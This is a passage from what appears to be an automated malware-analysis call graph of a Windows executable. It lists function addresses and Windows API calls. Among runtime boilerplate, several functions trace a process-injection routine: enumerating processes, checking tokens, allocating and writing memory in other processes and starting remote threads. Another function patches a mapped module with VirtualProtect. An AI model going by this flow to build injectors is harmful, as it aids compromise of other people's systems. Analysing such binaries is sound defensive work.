5970 140006e64 __free_lconv_num 5 API calls 5969->5970 5970->5952 5975 140006e64 __free_lconv_num 5 API calls 5972->5975 6005 140008e90 5973->6005 5974->5964 5975->5953 5978 140008d8d 5977->5978 6003 140008e88 5977->6003 5979 140008da7 5978->5979 5980 140006e64 __free_lconv_num 5 API calls 5978->5980 5981 140008db9 5979->5981 5982 140006e64 __free_lconv_num 5 API calls 5979->5982 5980->5979 5983 140008dcb 5981->5983 5984 140006e64 __free_lconv_num 5 API calls 5981->5984 5982->5981 5985 140008ddd 5983->5985 5986 140006e64 __free_lconv_num 5 API calls 5983->5986 5984->5983 5988 140008def 5985->5988 5989 140006e64 __free_lconv_num 5 API calls 5985->5989 5986->5985 5987 140008e01 5991 140008e13 5987->5991 5992 140006e64 __free_lconv_num 5 API calls 5987->5992 5988->5987 5990 140006e64 __free_lconv_num 5 API calls 5988->5990 5989->5988 5990->5987 5993 140008e25 5991->5993 5994 140006e64 __free_lconv_num 5 API calls 5991->5994 5992->5991 5995 140008e37 5993->5995 5996 140006e64 __free_lconv_num 5 API calls 5993->5996 5994->5993 5997 140008e49 5995->5997 5999 140006e64 __free_lconv_num 5 API calls 5995->5999 5996->5995 5998 140008e5e 5997->5998 6000 140006e64 __free_lconv_num 5 API calls 5997->6000 6001 140008e73 5998->6001 6002 140006e64 __free_lconv_num 5 API calls 5998->6002 5999->5997 6000->5998 6001->6003 6004 140006e64 __free_lconv_num 5 API calls 6001->6004 6002->6001 6003->5962 6004->6003 6006 140008e95 6005->6006 6015 140008ef6 6005->6015 6007 140008eae 6006->6007 6008 140006e64 __free_lconv_num 5 API calls 6006->6008 6009 140008ec0 6007->6009 6010 140006e64 __free_lconv_num 5 API calls 6007->6010 6008->6007 6011 140006e64 __free_lconv_num 5 API calls 6009->6011 6012 140008ed2 6009->6012 6010->6009 6011->6012 6013 140006e64 __free_lconv_num 5 API calls 6012->6013 6014 140008ee4 6012->6014 6013->6014 6014->6015 6016 140006e64 __free_lconv_num 5 API calls 6014->6016 6015->5959 6016->6015 6018 140009620 6017->6018 6019 1400095f5 6017->6019 6018->5964 6019->6018 6023 140008f54 6019->6023 6022 140006e64 __free_lconv_num 5 API calls 6022->6018 6024 14000904c 6023->6024 6025 140008f5d 6023->6025 6024->6022 6059 140008efc 6025->6059 6028 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6029 140008f86 6028->6029 6030 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6029->6030 6031 140008f94 6030->6031 6032 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6031->6032 6033 140008fa2 6032->6033 6034 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6033->6034 6035 140008fb1 6034->6035 6036 140006e64 __free_lconv_num 5 API calls 6035->6036 6037 140008fbd 6036->6037 6038 140006e64 __free_lconv_num 5 API calls 6037->6038 6039 140008fc9 6038->6039 6040 140006e64 __free_lconv_num 5 API calls 6039->6040 6041 140008fd5 6040->6041 6042 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6041->6042 6043 140008fe3 6042->6043 6044 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6043->6044 6045 140008ff1 6044->6045 6046 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6045->6046 6047 140008fff 6046->6047 6048 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6047->6048 6049 14000900d 6048->6049 6050 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6049->6050 6051 14000901c 6050->6051 6052 140006e64 __free_lconv_num 5 API calls 6051->6052 6053 140009028 6052->6053 6054 140006e64 __free_lconv_num 5 API calls 6053->6054 6055 140009034 6054->6055 6056 140006e64 __free_lconv_num 5 API calls 6055->6056 6057 140009040 6056->6057 6058 140006e64 __free_lconv_num 5 API calls 6057->6058 6058->6024 6060 140008f44 6059->6060 6061 140008f30 6059->6061 6060->6028 6061->6060 6062 140006e64 __free_lconv_num 5 API calls 6061->6062 6062->6061 6092 140009948 6063->6092 6065 140005b11 6065->5895 6066 1400099e0 6065->6066 6067 140009a08 6066->6067 6069 140009a29 6066->6069 6068 140006120 _invalid_parameter_noinfo 5 API calls 6067->6068 6067->6069 6073 140009a1c 6067->6073 6068->6073 6071 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6069->6071 6077 140009b00 6069->6077 6070 140009a66 6070->5895 6071->6077 6072 140009aa6 6074 14000663c _set_fmode 5 API calls 6072->6074 6073->6069 6073->6070 6073->6072 6075 140009aab 6074->6075 6095 140006460 6075->6095 6078 140009c33 6077->6078 6082 140009b71 6077->6082 6098 140005fa4 6077->6098 6081 140005fa4 21 API calls 6081->6082 6083 140005fa4 21 API calls 6082->6083 6083->6082 6085 140006286 __scrt_fastfail 6084->6085 6086 1400062ae RtlCaptureContext RtlLookupFunctionEntry 6085->6086 6087 1400062e8 RtlVirtualUnwind 6086->6087 6088 14000631e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6086->6088 6087->6088 6089 140006370 __scrt_fastfail 6088->6089 6131 140002200 6089->6131 6093 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6092->6093 6094 140009961 6093->6094 6094->6065 6125 1400063b0 6095->6125 6097 140006479 6097->6070 6099 140005fb9 try_get_function 6098->6099 6100 140005fcb 6099->6100 6101 1400069e8 _invalid_parameter_noinfo 2 API calls 6099->6101 6102 140006a30 _invalid_parameter_noinfo GetProcAddress 6100->6102 6104 140005fd3 SetLastError 6100->6104 6101->6100 6103 140005fee 6102->6103 6103->6104 6106 140006dec _invalid_parameter_noinfo 5 API calls 6103->6106 6107 140006072 6104->6107 6108 140006062 6104->6108 6109 140006001 6106->6109 6110 140005b08 20 API calls 6107->6110 6108->6081 6111 14000601f 6109->6111 6112 14000600f 6109->6112 6113 140006077 6110->6113 6114 140006a30 _invalid_parameter_noinfo GetProcAddress 6111->6114 6115 140006a30 _invalid_parameter_noinfo GetProcAddress 6112->6115 6117 140006027 6114->6117 6116 140006016 6115->6116 6120 140006e64 __free_lconv_num 5 API calls 6116->6120 6118 14000602b 6117->6118 6119 14000603d 6117->6119 6121 140006a30 _invalid_parameter_noinfo GetProcAddress 6118->6121 6122 140005d54 _invalid_parameter_noinfo 5 API calls 6119->6122 6120->6104 6121->6116 6123 140006045 6122->6123 6124 140006e64 __free_lconv_num 5 API calls 6123->6124 6124->6104 6126 140006120 _invalid_parameter_noinfo 5 API calls 6125->6126 6127 1400063d5 6126->6127 6128 1400063e6 __vcrt_FlsSetValue 6127->6128 6129 1400063b0 _invalid_parameter_noinfo 5 API calls 6127->6129 6128->6097 6130 140006479 6129->6130 6130->6097 6132 14000220a 6131->6132 6133 140002510 IsProcessorFeaturePresent 6132->6133 6134 140002216 6132->6134 6135 140002527 6133->6135 6134->5897 6140 140002704 RtlCaptureContext 6135->6140 6141 14000271e RtlLookupFunctionEntry 6140->6141 6142 140002734 RtlVirtualUnwind 6141->6142 6143 14000253a 6141->6143 6142->6141 6142->6143 6144 1400024dc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6143->6144 6146 140008133 6145->6146 6147 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6146->6147 6149 14000813d 6146->6149 6151 140008150 6147->6151 6148 1400081af 6148->5852 6149->6148 6150 140005b08 21 API calls 6149->6150 6152 1400081c7 6150->6152 6151->6149 6153 140006e64 __free_lconv_num 5 API calls 6151->6153 6154 14000821a 6152->6154 6155 140006078 21 API calls 6152->6155 6153->6149 6154->5852 6156 140008204 6155->6156 6157 140007f4c 30 API calls 6156->6157 6157->6154 6195 1400043a0 6158->6195 6161 140007c78 GetOEMCP 6164 140007c9f 6161->6164 6162 140007c8a 6163 140007c8f GetACP 6162->6163 6162->6164 6163->6164 6164->5855 6165 140006d8c 6164->6165 6166 140006dd7 6165->6166 6169 140006d9b _invalid_parameter_noinfo 6165->6169 6167 14000663c _set_fmode 5 API calls 6166->6167 6168 140006dd5 6167->6168 6168->5857 6171 140008244 6168->6171 6169->6166 6169->6168 6170 140004714 _invalid_parameter_noinfo EnterCriticalSection 6169->6170 6170->6169 6172 140007c58 23 API calls 6171->6172 6173 14000826f 6172->6173 6175 1400082ac IsValidCodePage 6173->6175 6180 1400082ef __scrt_fastfail 6173->6180 6174 140002200 _handle_error 8 API calls 6176 14000802f 6174->6176 6177 1400082bd 6175->6177 6175->6180 6176->5862 6176->5865 6178 1400082f4 GetCPInfo 6177->6178 6181 1400082c6 __scrt_fastfail 6177->6181 6178->6180 6178->6181 6180->6174 6228 140007d68 6181->6228 6183 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6182->6183 6184 140007ab8 __scrt_fastfail 6183->6184 6185 140007adb __scrt_fastfail 6184->6185 6186 14000663c _set_fmode 5 API calls 6184->6186 6189 14000663c _set_fmode 5 API calls 6185->6189 6192 140007b83 6185->6192 6187 140007b4a 6186->6187 6188 140006460 _invalid_parameter_noinfo 5 API calls 6187->6188 6188->6185 6190 140007be1 6189->6190 6191 140006460 _invalid_parameter_noinfo 5 API calls 6190->6191 6191->6192 6193 140007c1d 6192->6193 6194 140006e64 __free_lconv_num 5 API calls 6192->6194 6193->5857 6194->6193 6196 1400043c4 6195->6196 6197 1400043bf 6195->6197 6196->6197 6198 140005fa4 21 API calls 6196->6198 6197->6161 6197->6162 6199 1400043df 6198->6199 6203 14000665c 6199->6203 6204 140004402 6203->6204 6205 140006671 6203->6205 6207 140006690 6204->6207 6205->6204 6211 1400096f8 6205->6211 6208 1400066a5 6207->6208 6209 1400066b8 6207->6209 6208->6209 6225 140008228 6208->6225 6209->6197 6212 140005fa4 21 API calls 6211->6212 6213 140009707 6212->6213 6214 140009750 6213->6214 6215 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6213->6215 6214->6204 6216 14000972e 6215->6216 6221 140009764 6216->6221 6218 14000973e 6218->6214 6219 140005b08 21 API calls 6218->6219 6220 140009763 6219->6220 6222 140009783 6221->6222 6223 140009776 Concurrency::details::SchedulerProxy::DeleteThis 6221->6223 6222->6218 6223->6222 6224 140009450 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6223->6224 6224->6222 6226 140005fa4 21 API calls 6225->6226 6227 140008231 6226->6227 6229 140007da5 GetCPInfo 6228->6229 6230 140007e9d 6228->6230 6229->6230 6235 140007db8 6229->6235 6231 140002200 _handle_error 8 API calls 6230->6231 6232 140007f36 6231->6232 6232->6180 6239 140009234 6235->6239 6240 1400043a0 21 API calls 6239->6240 6241 140009276 6240->6241 6259 1400085b4 6241->6259 6260 1400085bc MultiByteToWideChar 6259->6260 6262 14000e360 6260->6262 6305 140001ac9 lstrcpyW lstrcatW 6304->6305 6306 140001cf4 6304->6306 6307 140001b17 __scrt_is_managed_app 6305->6307 6306->5747 6308 140001b23 GetCurrentProcess K32GetModuleInformation 6307->6308 6312 140001ccb try_get_function 6307->6312 6309 140001b57 CreateFileW 6308->6309 6308->6312 6311 140001b96 CreateFileMappingW 6309->6311 6309->6312 6310 140002200 _handle_error 8 API calls 6310->6306 6313 140001bc7 MapViewOfFile 6311->6313 6314 140001cba CloseHandle 6311->6314 6312->6310 6315 140001ca9 CloseHandle 6313->6315 6317 140001bf2 6313->6317 6314->6312 6315->6314 6316 140001c50 6316->6315 6317->6316 6318 140001c20 lstrcmpiA 6317->6318 6318->6317 6319 140001c52 VirtualProtect 6318->6319 6348 140003ea0 6319->6348 6350 1400045ec 6322->6350 6324 1400010d8 6325 140004388 6324->6325 6326 140005fa4 21 API calls 6325->6326 6327 140004395 6326->6327 6327->5754 6331 14000222c 6328->6331 6329 1400011eb 6334 140001d00 6329->6334 6330 140004714 _invalid_parameter_noinfo EnterCriticalSection 6330->6331 6331->6328 6331->6329 6331->6330 6356 1400028c4 6331->6356 6360 1400028e4 6331->6360 6335 140002268 3 API calls 6334->6335 6336 140001d3a 6335->6336 6337 140002268 3 API calls 6336->6337 6338 140001d50 K32EnumProcesses 6337->6338 6340 140001e5a 6338->6340 6343 140001d72 6338->6343 6339 140001da0 OpenProcess 6341 140001dc1 K32EnumProcessModules 6339->6341 6339->6343 6344 140002200 _handle_error 8 API calls 6340->6344 6342 140001e45 CloseHandle 6341->6342 6341->6343 6342->6343 6343->6339 6343->6340 6343->6342 6347 140001ded 6343->6347 6345 140001e99 6344->6345 6345->5773 6346 140001df0 ReadProcessMemory 6346->6347 6347->6342 6347->6343 6347->6346 6349 140001c84 VirtualProtect 6348->6349 6349->6316 6351 1400045fa 6350->6351 6354 14000460a 6350->6354 6352 14000663c _set_fmode 5 API calls 6351->6352 6353 1400045ff 6352->6353 6355 140006460 _invalid_parameter_noinfo 5 API calls 6353->6355 6354->6324 6355->6354 6357 1400028d2 std::bad_alloc::bad_alloc 6356->6357 6364 140003600 6357->6364 6359 1400028e3 6361 1400028f2 std::bad_alloc::bad_alloc 6360->6361 6362 140003600 Concurrency::cancel_current_task 2 API calls 6361->6362 6363 140002903 6362->6363 6363->6331 6365 14000363c RtlPcToFileHeader 6364->6365 6366 14000361f __vcrt_FlsSetValue 6364->6366 6367 140003663 RaiseException 6365->6367 6368 140003654 6365->6368 6366->6365 6367->6359 6368->6367 6370 140005fa4 21 API calls 6369->6370 6371 140005a91 __vcrt_FlsSetValue 6370->6371 6372 140005b08 21 API calls 6371->6372 6373 140005aa7 6372->6373 7184 140006cd4 7185 140006cdc 7184->7185 7186 140006acc 2 API calls 7185->7186 7187 140006d0d 7185->7187 7189 140006d09 7185->7189 7186->7185 7190 140006d38 7187->7190 7191 140006d63 7190->7191 7192 140006d46 DeleteCriticalSection 7191->7192 7193 140006d67 7191->7193 7192->7191 7193->7189 6605 14000a018 6606 14000a023 6605->6606 6614 14000bef4 6606->6614 6608 14000a028 6621 14000bfa8 6608->6621 6611 14000a059 6612 140006e64 __free_lconv_num 5 API calls 6611->6612 6613 14000a065 6612->6613 6615 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6614->6615 6620 14000bf0d 6615->6620 6616 14000bf8c 6616->6608 6617 14000bf57 DeleteCriticalSection 6619 140006e64 __free_lconv_num 5 API calls 6617->6619 6619->6620 6620->6616 6620->6617 6625 14000c3c4 6620->6625 6622 14000bfbb 6621->6622 6624 14000a03a DeleteCriticalSection 6621->6624 6623 140006e64 __free_lconv_num 5 API calls 6622->6623 6622->6624 6623->6624 6624->6608 6624->6611 6626 14000c3db 6625->6626 6630 14000c3f9 6625->6630 6627 14000663c _set_fmode 5 API calls 6626->6627 6628 14000c3e0 6627->6628 6629 140006460 _invalid_parameter_noinfo 5 API calls 6628->6629 6632 14000c3eb 6629->6632 6630->6632 6633 14000c340 6630->6633 6632->6620 6634 14000c352 6633->6634 6635 14000c367 6633->6635 6636 14000663c _set_fmode 5 API calls 6634->6636 6641 14000c362 6635->6641 6649 140009e28 6635->6649 6637 14000c357 6636->6637 6639 140006460 _invalid_parameter_noinfo 5 API calls 6637->6639 6639->6641 6641->6632 6642 14000bfa8 5 API calls 6643 14000c383 6642->6643 6655 14000a214 6643->6655 6648 140006e64 __free_lconv_num 5 API calls 6648->6641 6650 140009e45 6649->6650 6651 140009e73 6649->6651 6650->6651 6652 14000a214 5 API calls 6650->6652 6651->6642 6653 140009e66 6652->6653 6676 14000bb2c 6653->6676 6656 14000a22d 6655->6656 6657 14000a21d 6655->6657 6661 14000cd60 6656->6661 6658 14000663c _set_fmode 5 API calls 6657->6658 6659 14000a222 6658->6659 6660 140006460 _invalid_parameter_noinfo 5 API calls 6659->6660 6660->6656 6662 14000cd85 6661->6662 6663 14000cd70 6661->6663 6664 14000cde1 6662->6664 6668 14000cdb4 6662->6668 6665 14000661c 5 API calls 6663->6665 6666 14000661c 5 API calls 6664->6666 6667 14000cd75 6665->6667 6669 14000cde6 6666->6669 6670 14000663c _set_fmode 5 API calls 6667->6670 6811 14000ccec 6668->6811 6672 14000663c _set_fmode 5 API calls 6669->6672 6673 14000c392 6670->6673 6674 14000cdee 6672->6674 6673->6641 6673->6648 6675 140006460 _invalid_parameter_noinfo 5 API calls 6674->6675 6675->6673 6677 14000bb55 6676->6677 6678 14000bb6d 6676->6678 6696 14000661c 6677->6696 6680 14000bbe4 6678->6680 6684 14000bb9e 6678->6684 6682 14000661c 5 API calls 6680->6682 6685 14000bbe9 6682->6685 6683 14000663c _set_fmode 5 API calls 6695 14000bb62 6683->6695 6688 14000bbb5 6684->6688 6689 14000bbca 6684->6689 6686 14000663c _set_fmode 5 API calls 6685->6686 6687 14000bbf1 6686->6687 6690 140006460 _invalid_parameter_noinfo 5 API calls 6687->6690 6692 14000663c _set_fmode 5 API calls 6688->6692 6699 14000bc18 6689->6699 6690->6695 6693 14000bbba 6692->6693 6694 14000661c 5 API calls 6693->6694 6694->6695 6695->6651 6697 140006120 _invalid_parameter_noinfo 5 API calls 6696->6697 6698 140006625 6697->6698 6698->6683 6700 14000bc41 6699->6700 6725 14000bc5e 6699->6725 6701 14000bc46 6700->6701 6702 14000bc97 6700->6702 6703 14000661c 5 API calls 6701->6703 6704 14000bcad 6702->6704 6741 14000c2fc 6702->6741 6705 14000bc4b 6703->6705 6751 14000bfe8 6704->6751 6708 14000663c _set_fmode 5 API calls 6705->6708 6710 14000bc53 6708->6710 6712 140006460 _invalid_parameter_noinfo 5 API calls 6710->6712 6711 14000bdc6 6713 14000be27 WriteFile 6711->6713 6714 14000bdd8 6711->6714 6712->6725 6715 14000bd98 try_get_function 6713->6715 6716 14000bde1 6714->6716 6717 14000be13 6714->6717 6715->6725 6728 14000be9c 6715->6728 6731 14000be8c 6715->6731 6734 14000663c _set_fmode 5 API calls 6715->6734 6719 14000bde6 6716->6719 6720 14000bdff 6716->6720 6783 14000b79c 6717->6783 6718 140005fa4 21 API calls 6721 14000bcde 6718->6721 6719->6715 6770 14000b8a0 6719->6770 6776 14000b9bc 6720->6776 6721->6711 6724 14000bd04 GetConsoleMode 6721->6724 6724->6711 6727 14000bd26 6724->6727 6725->6695 6729 14000bda8 6727->6729 6740 14000bd2b 6727->6740 6728->6725 6733 14000663c _set_fmode 5 API calls 6728->6733 6759 14000b2cc GetConsoleCP 6729->6759 6789 1400065cc 6731->6789 6735 14000bebe 6733->6735 6736 14000be81 6734->6736 6737 14000661c 5 API calls 6735->6737 6738 14000661c 5 API calls 6736->6738 6737->6725 6738->6731 6739 14000c304 CreateFileW WriteConsoleW CloseHandle CreateFileW WriteConsoleW 6739->6740 6740->6715 6740->6739 6742 14000c260 6741->6742 6794 140008a94 6742->6794 6745 14000c285 6747 14000663c _set_fmode 5 API calls 6745->6747 6746 14000c296 SetFilePointerEx 6748 14000c28a 6746->6748 6749 14000c2ae try_get_function 6746->6749 6747->6748 6748->6704 6750 1400065cc 5 API calls 6749->6750 6750->6748 6752 14000bff1 6751->6752 6753 14000bffe 6751->6753 6754 14000663c _set_fmode 5 API calls 6752->6754 6755 14000bcbb 6753->6755 6756 14000663c _set_fmode 5 API calls 6753->6756 6754->6755 6755->6711 6755->6718 6757 14000c035 6756->6757 6758 140006460 _invalid_parameter_noinfo 5 API calls 6757->6758 6758->6755 6760 1400043a0 21 API calls 6759->6760 6766 14000b350 6760->6766 6761 140002200 _handle_error 8 API calls 6762 14000b6dc 6761->6762 6762->6715 6764 140008610 WideCharToMultiByte 6764->6766 6765 14000b5d0 WriteFile 6765->6766 6769 14000b66f try_get_function 6765->6769 6766->6764 6766->6765 6766->6766 6767 14000c0d0 13 API calls 6766->6767 6768 14000b617 WriteFile 6766->6768 6766->6769 6806 1400066c4 6766->6806 6767->6766 6768->6766 6768->6769 6769->6761 6771 14000b8b8 6770->6771 6774 14000b947 WriteFile 6771->6774 6775 14000b984 try_get_function 6771->6775 6772 140002200 _handle_error 8 API calls 6773 14000b9a1 6772->6773 6773->6715 6774->6771 6774->6775 6775->6772 6780 14000b9d8 6776->6780 6777 140002200 _handle_error 8 API calls 6778 14000bb10 6777->6778 6778->6715 6779 140008610 WideCharToMultiByte 6779->6780 6780->6779 6781 14000baf5 try_get_function 6780->6781 6782 14000bab2 WriteFile 6780->6782 6781->6777 6782->6780 6782->6781 6785 14000b7b4 6783->6785 6784 140002200 _handle_error 8 API calls 6786 14000b886 6784->6786 6787 14000b832 WriteFile 6785->6787 6788 14000b869 try_get_function 6785->6788 6786->6715 6787->6785 6787->6788 6788->6784 6790 140006120 _invalid_parameter_noinfo 5 API calls 6789->6790 6791 1400065dd 6790->6791 6792 140006120 _invalid_parameter_noinfo 5 API calls 6791->6792 6793 1400065f6 __free_lconv_num 6792->6793 6793->6728 6795 140008a9d 6794->6795 6797 140008ab2 6794->6797 6796 14000661c 5 API calls 6795->6796 6799 140008aa2 6796->6799 6798 14000661c 5 API calls 6797->6798 6803 140008aaa 6797->6803 6800 140008aed 6798->6800 6801 14000663c _set_fmode 5 API calls 6799->6801 6802 14000663c _set_fmode 5 API calls 6800->6802 6801->6803 6804 140008af5 6802->6804 6803->6745 6803->6746 6805 140006460 _invalid_parameter_noinfo 5 API calls 6804->6805 6805->6803 6807 140005fa4 21 API calls 6806->6807 6808 1400066cd 6807->6808 6809 14000665c 21 API calls 6808->6809 6810 1400066e6 6809->6810 6810->6766 6812 14000cd08 6811->6812 6813 14000cd32 6812->6813 6814 14000cd3b 6812->6814 6818 14000ce04 6813->6818 6816 14000663c _set_fmode 5 API calls 6814->6816 6817 14000cd37 6816->6817 6817->6673 6819 140008a94 5 API calls 6818->6819 6820 14000ce18 6819->6820 6821 14000ce1e try_get_function 6820->6821 6823 14000ce5b 6820->6823 6825 140008a94 5 API calls 6820->6825 6832 1400089d8 6821->6832 6823->6821 6826 140008a94 5 API calls 6823->6826 6828 14000ce4e 6825->6828 6829 14000ce67 CloseHandle 6826->6829 6827 14000ceaf 6827->6817 6831 140008a94 5 API calls 6828->6831 6829->6821 6830 1400065cc 5 API calls 6830->6827 6831->6823 6833 1400089f4 6832->6833 6834 140008a66 6832->6834 6833->6834 6840 140008a27 6833->6840 6835 14000663c _set_fmode 5 API calls 6834->6835 6836 140008a6b 6835->6836 6837 14000661c 5 API calls 6836->6837 6838 140008a58 6837->6838 6838->6827 6838->6830 6839 140008a50 SetStdHandle 6839->6838 6840->6838 6840->6839 6841 14000c61b 6842 14000c8c0 6841->6842 6844 14000c65b 6841->6844 6843 14000c8b6 6842->6843 6848 14000d1a0 _log10_special 14 API calls 6842->6848 6844->6842 6845 14000c68f 6844->6845 6846 14000c8a2 6844->6846 6849 14000d1a0 6846->6849 6848->6843 6852 14000d1c0 6849->6852 6853 14000d1da 6852->6853 6854 14000d1bb 6853->6854 6856 14000d004 6853->6856 6854->6843 6857 14000d044 _handle_error 6856->6857 6859 14000d0b0 _handle_error 6857->6859 6867 14000d2c0 6857->6867 6860 14000d0ed 6859->6860 6861 14000d0bd 6859->6861 6874 14000d5f8 6860->6874 6870 14000cee0 6861->6870 6864 14000d0eb _handle_error 6865 140002200 _handle_error 8 API calls 6864->6865 6866 14000d115 6865->6866 6866->6854 6880 14000d2e8 6867->6880 6871 14000cf24 _handle_error 6870->6871 6872 14000cf39 6871->6872 6873 14000d5f8 _set_errno_from_matherr 5 API calls 6871->6873 6872->6864 6873->6872 6875 14000d601 6874->6875 6876 14000d616 6874->6876 6878 14000663c _set_fmode 5 API calls 6875->6878 6879 14000d60e 6875->6879 6877 14000663c _set_fmode 5 API calls 6876->6877 6877->6879 6878->6879 6879->6864 6881 14000d327 _raise_exc _clrfp 6880->6881 6882 14000d53c RaiseException 6881->6882 6883 14000d2e2 6882->6883 6883->6859 7194 14000b0dc 7195 1400081c8 30 API calls 7194->7195 7196 14000b0e5 7195->7196 7453 14000abdd 7454 14000abf8 7453->7454 7454->7454 7455 14000acad 7454->7455 7456 14000acc6 7454->7456 7457 14000663c _set_fmode 5 API calls 7455->7457 7458 14000acbd 7456->7458 7461 1400043a0 21 API calls 7456->7461 7459 14000acb2 7457->7459 7460 140006460 _invalid_parameter_noinfo 5 API calls 7459->7460 7460->7458 7461->7458 6441 140002120 6442 140002268 3 API calls 6441->6442 6443 14000214f 6442->6443 6444 140002268 3 API calls 6443->6444 6448 14000215c 6444->6448 6445 140002170 K32EnumProcesses 6446 1400021e4 Sleep 6445->6446 6445->6448 6446->6445 6447 1400021cf 6447->6446 6448->6445 6448->6447 6451 140001420 6448->6451 6488 140001430 6448->6488 6452 140001440 OpenProcess 6451->6452 6453 140001761 6452->6453 6454 14000149c IsWow64Process 6452->6454 6458 140002200 _handle_error 8 API calls 6453->6458 6455 1400014b5 CloseHandle 6454->6455 6456 14000175b CloseHandle 6454->6456 6455->6453 6457 1400014cd OpenProcess 6455->6457 6456->6453 6457->6453 6460 1400014e9 K32GetModuleFileNameExW 6457->6460 6459 140001773 6458->6459 6459->6448 6461 140001503 PathFindFileNameW 6460->6461 6462 140001525 NtQueryInformationProcess 6460->6462 6525 14000447c 6461->6525 6464 14000154a 6462->6464 6468 140001750 6462->6468 6466 140001554 OpenProcessToken 6464->6466 6464->6468 6465 14000151d 6465->6453 6465->6462 6467 14000157a GetTokenInformation 6466->6467 6466->6468 6469 14000161b 6467->6469 6470 14000159d try_get_function 6467->6470 6468->6456 6471 14000161f CloseHandle 6469->6471 6470->6469 6473 1400015a8 LocalAlloc 6470->6473 6471->6468 6472 140001633 6471->6472 6472->6468 6477 140001651 VirtualAllocEx 6472->6477 6473->6469 6474 1400015bc GetTokenInformation 6473->6474 6475 1400015e2 GetSidSubAuthorityCount GetSidSubAuthority LocalFree 6474->6475 6476 14000160c LocalFree 6474->6476 6475->6471 6476->6471 6477->6468 6478 140001679 WriteProcessMemory 6477->6478 6478->6468 6479 140001698 GetModuleHandleA 6478->6479 6480 1400016c4 6479->6480 6481 1400016af GetProcAddress 6479->6481 6482 1400016c7 NtCreateThreadEx 6480->6482 6481->6482 6482->6468 6483 140001704 6482->6483 6483->6468 6484 14000171a WaitForSingleObject 6483->6484 6487 140001713 CloseHandle 6483->6487 6486 140001729 GetExitCodeThread 6484->6486 6484->6487 6486->6487 6487->6468 6489 140001440 OpenProcess 6488->6489 6490 140001761 6489->6490 6491 14000149c IsWow64Process 6489->6491 6495 140002200 _handle_error 8 API calls 6490->6495 6492 1400014b5 CloseHandle 6491->6492 6493 14000175b CloseHandle 6491->6493 6492->6490 6494 1400014cd OpenProcess 6492->6494 6493->6490 6494->6490 6497 1400014e9 K32GetModuleFileNameExW 6494->6497 6496 140001773 6495->6496 6496->6448 6498 140001503 PathFindFileNameW 6497->6498 6499 140001525 NtQueryInformationProcess 6497->6499 6500 14000447c 22 API calls 6498->6500 6501 14000154a 6499->6501 6505 140001750 6499->6505 6502 14000151d 6500->6502 6503 140001554 OpenProcessToken 6501->6503 6501->6505 6502->6490 6502->6499 6504 14000157a GetTokenInformation 6503->6504 6503->6505 6506 14000161b 6504->6506 6507 14000159d try_get_function 6504->6507 6505->6493 6508 14000161f CloseHandle 6506->6508 6507->6506 6510 1400015a8 LocalAlloc 6507->6510 6508->6505 6509 140001633 6508->6509 6509->6505 6514 140001651 VirtualAllocEx 6509->6514 6510->6506 6511 1400015bc GetTokenInformation 6510->6511 6512 1400015e2 GetSidSubAuthorityCount GetSidSubAuthority LocalFree 6511->6512 6513 14000160c LocalFree 6511->6513 6512->6508 6513->6508 6514->6505 6515 140001679 WriteProcessMemory 6514->6515 6515->6505 6516 140001698 GetModuleHandleA 6515->6516 6517 1400016c4 6516->6517 6518 1400016af GetProcAddress 6516->6518 6519 1400016c7 NtCreateThreadEx 6517->6519 6518->6519 6519->6505 6520 140001704 6519->6520 6520->6505 6521 14000171a WaitForSingleObject 6520->6521 6524 140001713 CloseHandle 6520->6524 6523 140001729 GetExitCodeThread 6521->6523 6521->6524 6523->6524 6524->6505 6526 1400044ad 6525->6526 6527 140004489 6525->6527 6529 1400044e7 6526->6529 6532 140004506 6526->6532 6527->6526 6528 14000448e 6527->6528 6530 14000663c _set_fmode 5 API calls 6528->6530 6531 14000663c _set_fmode 5 API calls 6529->6531 6533 140004493 6530->6533 6534 1400044ec 6531->6534 6535 1400043a0 21 API calls 6532->6535 6536 140006460 _invalid_parameter_noinfo 5 API calls 6533->6536 6537 140006460 _invalid_parameter_noinfo 5 API calls 6534->6537 6540 140004513 6535->6540 6538 14000449e 6536->6538 6539 1400044f7 6537->6539 6538->6465 6539->6465 6540->6539 6541 1400064c8 22 API calls 6540->6541 6541->6540 7151 1400036a0 7158 140003b24 7151->7158 7155 1400036b6 7156 140003b58 __vcrt_uninitialize_locks DeleteCriticalSection 7155->7156 7157 1400036ad 7155->7157 7156->7157 7167 140003e08 7158->7167 7160 140003b3c 7161 1400036a9 7160->7161 7162 140003b58 __vcrt_uninitialize_locks DeleteCriticalSection 7160->7162 7161->7157 7163 140003ab8 7161->7163 7162->7161 7164 140003ac8 7163->7164 7166 140003ae1 __vcrt_uninitialize_ptd 7164->7166 7172 140003db4 7164->7172 7166->7155 7168 140003b90 __vcrt_FlsSetValue GetProcAddress 7167->7168 7169 140003e3e 7168->7169 7170 140003e53 InitializeCriticalSectionAndSpinCount 7169->7170 7171 140003e48 __vcrt_FlsSetValue 7169->7171 7170->7171 7171->7160 7173 140003b90 __vcrt_FlsSetValue GetProcAddress 7172->7173 7174 140003de2 __vcrt_FlsSetValue 7173->7174 7174->7166 7350 1400059a0 7351 1400059b9 7350->7351 7353 1400059d1 7350->7353 7352 140006e64 __free_lconv_num 5 API calls 7351->7352 7351->7353 7352->7353 7462 1400059e0 7463 140006e64 __free_lconv_num 5 API calls 7462->7463 7464 1400059f0 7463->7464 7465 140006e64 __free_lconv_num 5 API calls 